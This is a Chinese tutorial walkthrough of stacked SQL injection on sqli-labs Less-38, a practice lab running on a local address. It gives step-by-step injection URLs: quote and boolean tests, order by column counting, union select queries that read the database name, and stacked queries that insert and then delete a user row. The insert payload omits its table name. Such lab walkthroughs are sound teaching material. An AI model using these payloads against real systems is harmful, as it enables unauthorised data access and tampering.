sql_lab之sqli中的堆叠型注入(less-38)

堆叠注入(less-38)

1.判断注入类型

http://127.0.0.3/less-38/?id=1' and 1=2 -- s 没有回显

http://127.0.0.3/less-38/?id=1' and 1=1 -- s 有回显

则说明是单字节'注入

2.查询字段数

http://127.0.0.3/less-38/?id=1' order by 4 -- s 报错

http://127.0.0.3/less-38/?id=1' order by 3 -- s 有回显

说明字段数为3

3.判断回显点

http://127.0.0.3/less-38/?id=-1' union select 1,2,3 -- s

4.查询数据库

http://127.0.0.3/less-38/?id=-1' union select 1,database(),3 -- s

接下来的步骤可以用联合查询进行查询

堆叠注入攻击

(1)在users表中添加一个用户

http://127.0.0.3/less-38/?id=1'; insert into values(17,'gao','a123456') -- s

证明添加成功

(2)在users表中删除一个用户

http://127.0.0.3/less-38/?id=1';delete from users where users.username='gao' -- s

表中没有gao这个用户,说明删除成功

相关推荐
好奇的菜鸟6 小时前
Spring Boot 事务失效问题:同一个 Service 类中方法调用导致事务失效的原因及解决方案
数据库·spring boot·sql
岁岁岁平安7 小时前
Redis基础学习(五大值数据类型的常用操作命令)
数据库·redis·学习·redis list·redis hash·redis set·redis string
小光学长9 小时前
基于vue框架的防疫科普网站0838x(程序+源码+数据库+调试部署+开发环境)带论文文档1万字以上,文末可获取,系统界面在最后面。
数据库
极限实验室9 小时前
使用 Docker Compose 简化 INFINI Console 与 Easysearch 环境搭建
数据库·docker·devops
飞翔的佩奇9 小时前
Java项目:基于SSM框架实现的旅游协会管理系统【ssm+B/S架构+源码+数据库+毕业论文】
java·数据库·mysql·毕业设计·ssm·旅游·jsp
float_六七11 小时前
SQL六大核心类别全解析
数据库·sql·oracle
Code季风13 小时前
将 gRPC 服务注册到 Consul:从配置到服务发现的完整实践(上)
数据库·微服务·go·json·服务发现·consul
Boilermaker199213 小时前
【Java EE】SpringIoC
前端·数据库·spring
霸王龙的小胳膊13 小时前
泛微虚拟视图-数据虚拟化集成
数据库
灵犀学长13 小时前
解锁Spring Boot多项目共享Redis:优雅Key命名结构指南
数据库·redis